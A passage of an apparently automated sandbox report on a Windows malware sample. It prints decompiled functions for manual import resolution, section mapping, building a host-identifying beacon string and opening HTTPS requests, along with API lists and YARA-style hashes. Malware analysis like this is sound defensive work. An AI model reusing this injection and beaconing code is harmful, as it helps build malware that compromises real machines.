				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403100;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x00401264
0x0040126d
0x00401272
0x00401278
0x00401281
0x00401287
0x00401289
0x0040128c
0x00401291
0x00401298
0x00401298
0x0040129c
0x004012a2
0x004012a7
0x00000000
0x00000000
0x004012ad
0x004012b7
0x004012b9
0x004012bc
0x004012bf
0x004012c3
0x004012cb
0x004012cd
0x004012d0
0x00401338
0x00401338
0x0040133c
0x00000000
0x00000000
0x004012d5
0x004012db
0x004012dd
0x004012f0
0x004012f3
0x004012f3
0x004012f3
0x004012f7
0x004012df
0x004012df
0x004012e7
0x004012e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004012e9
0x004012d7
0x004012d7
0x004012eb
0x004012eb
0x004012eb
0x004012fa
0x004012fd
0x004012ff
0x00401306
0x00401301
0x00401301
0x00401301
0x0040130e
0x00401314
0x00401316
0x00401346
0x00401318
0x00401318
0x0040131b
0x0040131d
0x00401325
0x00401325
0x0040132a
0x0040132c
0x00401333
0x00401335
0x00401335
0x00401335
0x00000000
0x00401335
0x00000000
0x00401316
0x004012c5
0x004012c5
0x004012c9
0x00000000
0x00000000
0x004012c9
0x00401349
0x00401349
0x00401350
0x00401355
0x00000000
0x00000000
0x0040135b
0x00401366
0x00000000
0x00401366
0x0040135d
0x0040135d
0x00401363
0x00000000
0x00401363
0x00401291
0x00401367
0x0040136c

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040129C
GetProcAddress.KERNEL32(?,00000000), ref: 0040130E

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction ID: 08ebcf6dcd3e0bd4ed0640795f354858f0b5a52c81c2c864c780740fbe29bbaa
Opcode Fuzzy Hash: b3be36541267bfaee00303300a6f938f46477752dc3d0cb2711c0485800f4ef2
Instruction Fuzzy Hash: 74312771A002069BDB14CF99C894AAEB7F4BF08354B1440BED901FB3A0E778EA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401715
0x0040171b
0x00401729
0x00401730
0x00401735
0x0040173b
0x00000000
0x0040173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401D02,00000002,00000000,?,?,00000000,?,?,00401D02,00000002), ref: 00401730

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 5d5daab65626f5a8b20b58ce6b1aa041d559c67da48c763f4c54447031275def
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 10F037B590020CFFDB119FA5CC85CAFBBBDEB44394B10493AF152E20A0D6309E499B61

Uniqueness

Uniqueness Score: -1.00%

Function 0042F117, Relevance: 44.4, APIs: 3, Strings: 22, Instructions: 682COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042F38A

Strings

xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo, xrefs: 0042F722
Dinilezu lacuke, xrefs: 0042F7F0
mikujukezicuharu, xrefs: 0042F7CF
Regefiri, xrefs: 0042F3F4
Xegixaze, xrefs: 0042F469
zetipabobutobawekicugi, xrefs: 0042F7C0
geceyuhocavanino goruyitozekitapopit, xrefs: 0042F47A
pemahu, xrefs: 0042F39B
Dumepof xumijaxovikik kemarep, xrefs: 0042F86C
zijiwe, xrefs: 0042F6E8
furafizasuyesipebokevocejirijan, xrefs: 0042F7CA
Petoco, xrefs: 0042F9CC
iyeg xogahes yoxohavit jobikuz, xrefs: 0042F45F
Lebihukemihuw puzihicafiruzat dexewiyuvizafa soj gelaxubedi, xrefs: 0042F861
Madesomaco diyoxilan xuw hihozexow, xrefs: 0042F867
2Y?, xrefs: 0042F745
Hucet, xrefs: 0042F458
\H, xrefs: 0042F6BE
Vefu mif kaxigija puhirege puwuf, xrefs: 0042F3EA
Hagavete buyihexinag remibumepupabo gojokekisila, xrefs: 0042F3EF
mecevituxe, xrefs: 0042F7C5
ecucedidulola sedelalex zapexukigasu jihiwexogucup, xrefs: 0042F464

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID: 2Y?$Dinilezu lacuke$Dumepof xumijaxovikik kemarep$Hagavete buyihexinag remibumepupabo gojokekisila$Hucet$Lebihukemihuw puzihicafiruzat dexewiyuvizafa soj gelaxubedi$Madesomaco diyoxilan xuw hihozexow$Petoco$Regefiri$Vefu mif kaxigija puhirege puwuf$Xegixaze$ecucedidulola sedelalex zapexukigasu jihiwexogucup$furafizasuyesipebokevocejirijan$geceyuhocavanino goruyitozekitapopit$iyeg xogahes yoxohavit jobikuz$mecevituxe$mikujukezicuharu$pemahu$xisilumibuvetufonahuvemugeli tewafuvapiwiyuzotuvu fatejevohivo$zetipabobutobawekicugi$zijiwe$\H
API String ID: 2102423945-296773746
Opcode ID: d3a9f44a512bcaf952d0ce43f69d393ecde4a3fd87d03091bb128e0230ec2049
Instruction ID: ac96cdd78f2ea7d78b5a76d4df9247b84211bc1982cffec00352c16e6f315d94
Opcode Fuzzy Hash: d3a9f44a512bcaf952d0ce43f69d393ecde4a3fd87d03091bb128e0230ec2049
Instruction Fuzzy Hash: BD325F71248344BFE3609FA0DE49F9B7BB8EB88745F40452DF74AE50A0DBB46444CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 03C49BF1, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E03C49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x3c4d018; // 0x9428ee6e
				asm("bswap eax");
				_t27 =  *0x3c4d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x3c4d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x3c4d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x3c4d2a8; // 0xb0a5a8
				_t3 = _t30 + 0x3c4e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x3c4d02c,  *0x3c4d004, _t25);
				_t33 = E03C43288();
				_t34 =  *0x3c4d2a8; // 0xb0a5a8
				_t4 = _t34 + 0x3c4e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E03C4831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x3c4d2a8; // 0xb0a5a8
					_t6 = _t83 + 0x3c4e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x3c4d238, 0, _t96);
				}
				_t97 = E03C49267();
				if(_t97 != 0) {
					_t78 =  *0x3c4d2a8; // 0xb0a5a8
					_t8 = _t78 + 0x3c4e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x3c4d238, 0, _t97);
				}
				_t98 =  *0x3c4d32c; // 0x47595b0
				_a32 = E03C4284E(0x3c4d00a, _t98 + 4);
				_t42 =  *0x3c4d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x3c4d2a8; // 0xb0a5a8
					_t11 = _t74 + 0x3c4e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x3c4d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x3c4d2a8; // 0xb0a5a8
					_t13 = _t71 + 0x3c4e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x3c4d238, 0, 0x800);
					if(_t100 != 0) {
						E03C43239(GetTickCount());
						_t50 =  *0x3c4d32c; // 0x47595b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x3c4d32c; // 0x47595b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x3c4d32c; // 0x47595b0
						_t103 = E03C47B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x3c4c28c);
							_push(_t103);
							_t62 = E03C4A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E03C4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E03C45433();
								}
								HeapFree( *0x3c4d238, 0, _v44);
							}
							RtlFreeHeap( *0x3c4d238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x3c4d238, 0, _t100); // executed
					}
					HeapFree( *0x3c4d238, 0, _a24);
				}
				RtlFreeHeap( *0x3c4d238, 0, _t105); // executed
				return _a4;
			}

0x03c49bf1
0x03c49bf1
0x03c49bf1
0x03c49bf6
0x03c49bfc
0x03c49c06
0x03c49c08
0x03c49c08
0x03c49c15
0x03c49c20
0x03c49c23
0x03c49c2e
0x03c49c31
0x03c49c36
0x03c49c39
0x03c49c3e
0x03c49c41
0x03c49c4d
0x03c49c5a
0x03c49c5c
0x03c49c62
0x03c49c67
0x03c49c72
0x03c49c74
0x03c49c77
0x03c49c79
0x03c49c7e
0x03c49c82
0x03c49c84
0x03c49c89
0x03c49c95
0x03c49c97
0x03c49ca3
0x03c49ca5
0x03c49ca5
0x03c49cb0
0x03c49cb4
0x03c49cb6
0x03c49cbb
0x03c49cc7
0x03c49cc9
0x03c49cd5
0x03c49cd7
0x03c49cd7
0x03c49cdd
0x03c49cf0
0x03c49cf4
0x03c49cfb
0x03c49cfe
0x03c49d03
0x03c49d0e
0x03c49d10
0x03c49d13
0x03c49d13
0x03c49d15
0x03c49d1c
0x03c49d1f
0x03c49d24
0x03c49d2e
0x03c49d30
0x03c49d38
0x03c49d51
0x03c49d55
0x03c49d61
0x03c49d66
0x03c49d6f
0x03c49d80
0x03c49d84
0x03c49d8d
0x03c49d93
0x03c49da0
0x03c49dad
0x03c49db3
0x03c49dbf
0x03c49dc5
0x03c49dc6
0x03c49dcb
0x03c49dd1
0x03c49dd7
0x03c49dde
0x03c49de5
0x03c49deb
0x03c49df2
0x03c49df6
0x03c49e01
0x03c49e06
0x03c49e0c
0x03c49e15
0x03c49e15
0x03c49e26
0x03c49e26
0x03c49e35
0x03c49e35
0x03c49e44
0x03c49e44
0x03c49e56
0x03c49e56
0x03c49e65
0x03c49e76

APIs

GetTickCount.KERNEL32 ref: 03C49C08
wsprintfA.USER32 ref: 03C49C55
wsprintfA.USER32 ref: 03C49C72
wsprintfA.USER32 ref: 03C49C95
HeapFree.KERNEL32(00000000,00000000), ref: 03C49CA5
wsprintfA.USER32 ref: 03C49CC7
HeapFree.KERNEL32(00000000,00000000), ref: 03C49CD7
wsprintfA.USER32 ref: 03C49D0E
wsprintfA.USER32 ref: 03C49D2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03C49D4B
GetTickCount.KERNEL32 ref: 03C49D5B
RtlEnterCriticalSection.NTDLL(04759570), ref: 03C49D6F
RtlLeaveCriticalSection.NTDLL(04759570), ref: 03C49D8D

Part of subcall function 03C47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,03C49DA0,?,047595B0), ref: 03C47BB8
Part of subcall function 03C47B8D: lstrlen.KERNEL32(?,?,?,03C49DA0,?,047595B0), ref: 03C47BC0
Part of subcall function 03C47B8D: strcpy.NTDLL ref: 03C47BD7
Part of subcall function 03C47B8D: lstrcat.KERNEL32(00000000,?), ref: 03C47BE2
Part of subcall function 03C47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,047595B0), ref: 03C47BFF

StrTrimA.SHLWAPI(00000000,03C4C28C,?,047595B0), ref: 03C49DBF

Part of subcall function 03C4A677: lstrlen.KERNEL32(04759BF8,00000000,00000000,74ECC740,03C49DCB,00000000), ref: 03C4A687
Part of subcall function 03C4A677: lstrlen.KERNEL32(?), ref: 03C4A68F
Part of subcall function 03C4A677: lstrcpy.KERNEL32(00000000,04759BF8), ref: 03C4A6A3
Part of subcall function 03C4A677: lstrcat.KERNEL32(00000000,?), ref: 03C4A6AE

lstrcpy.KERNEL32(00000000,?), ref: 03C49DDE
lstrcpy.KERNEL32(00000000,00000000), ref: 03C49DE5
lstrcat.KERNEL32(00000000,?), ref: 03C49DF2
lstrcat.KERNEL32(00000000,00000000), ref: 03C49DF6

Part of subcall function 03C4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 03C493EC

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 03C49E26
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 03C49E35
RtlFreeHeap.NTDLL(00000000,00000000,?,047595B0), ref: 03C49E44
HeapFree.KERNEL32(00000000,00000000), ref: 03C49E56
RtlFreeHeap.NTDLL(00000000,?), ref: 03C49E65

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: 4867f8458d65f12f37be7edd44e7c824321e72bc04bcfa7a9f15c57a025db28f
Instruction ID: 1a92da509ba98a22b6220ecccfd2266fd3bfbfcdd4dcbd0e9de4903e7ec56fec
Opcode Fuzzy Hash: 4867f8458d65f12f37be7edd44e7c824321e72bc04bcfa7a9f15c57a025db28f
Instruction Fuzzy Hash: 62619D79500200AFC721FBA8EC48F5BBBE8EB48750F054614F90ADB266DB35ED069B65

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E03C4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E03C41525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E03C48B22(_t56);
					} else {
						E03C48B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E03C4A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E03C429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x3c4d2a8; // 0xb0a5a8
						_t15 = _t59 + 0x3c4e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x03c4a85c
0x03c4a85c
0x03c4a867
0x03c4a86e
0x03c4a876
0x03c4a880
0x03c4a886
0x03c4a899
0x03c4a8a9
0x03c4a89b
0x03c4a89e
0x03c4a8a3
0x03c4a8a3
0x03c4a899
0x03c4a8b9
0x03c4a8bf
0x03c4a8c4
0x03c4a9b0
0x00000000
0x03c4a8df
0x03c4a8e2
0x03c4a8f8
0x03c4a8fe
0x03c4a903
0x03c4a92b
0x03c4a93e
0x03c4a948
0x03c4a94b
0x03c4a951
0x03c4a956
0x00000000
0x00000000
0x03c4a95a
0x03c4a966
0x03c4a977
0x03c4a979
0x03c4a98a
0x03c4a98a
0x03c4a99a
0x00000000
0x03c4a9ac
0x00000000
0x03c4a9ac
0x00000000
0x00000000
0x00000000
0x03c4a903

APIs

lstrlen.KERNEL32(?,00000008,75144D40), ref: 03C4A86E

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 03C4A891
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 03C4A8B9
InternetSetStatusCallback.WININET(00000000,03C4A7F1), ref: 03C4A8D0
ResetEvent.KERNEL32(?), ref: 03C4A8E2
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 03C4A8F8
GetLastError.KERNEL32 ref: 03C4A905
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 03C4A94B
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 03C4A969
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 03C4A98A
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 03C4A996
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 03C4A9A6
GetLastError.KERNEL32 ref: 03C4A9B0

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: 78a7c75d4b2d874398e1d20751afa7053021d7f5f63affc61633d759877c1e99
Instruction ID: 81df2a1baaca71f0dadcfd1ff26ba0cd7968b2022153fc4b29af9dbae3ae490f
Opcode Fuzzy Hash: 78a7c75d4b2d874398e1d20751afa7053021d7f5f63affc61633d759877c1e99
Instruction Fuzzy Hash: BB416D79540204BFDB31EFA1DC88E9BBABDEB89710B154929F943D5191D731EA44CA20

Uniqueness

Uniqueness Score: -1.00%

Function 03C4AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E03C4AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x3c40000;
				_t115 = _t139[3] + 0x3c40000;
				_t131 = _t139[4] + 0x3c40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x3c40000;
				_v16 = _t139[5] + 0x3c40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x3c40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x3c4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x3c4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x3c4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x3c4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x3c4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x3c4d198; // 0x0
										 *_t102 = _t125;
										 *0x3c4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x3c4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x03c4aca4
0x03c4acba
0x03c4acc0
0x03c4acc2
0x03c4acc7
0x03c4accd
0x03c4acd2
0x03c4acd5
0x03c4ace3
0x03c4acea
0x03c4aced
0x03c4acf0
0x03c4acf1
0x03c4acf4
0x03c4acf7
0x03c4acfa
0x03c4acff
0x03c4ad0e
0x00000000
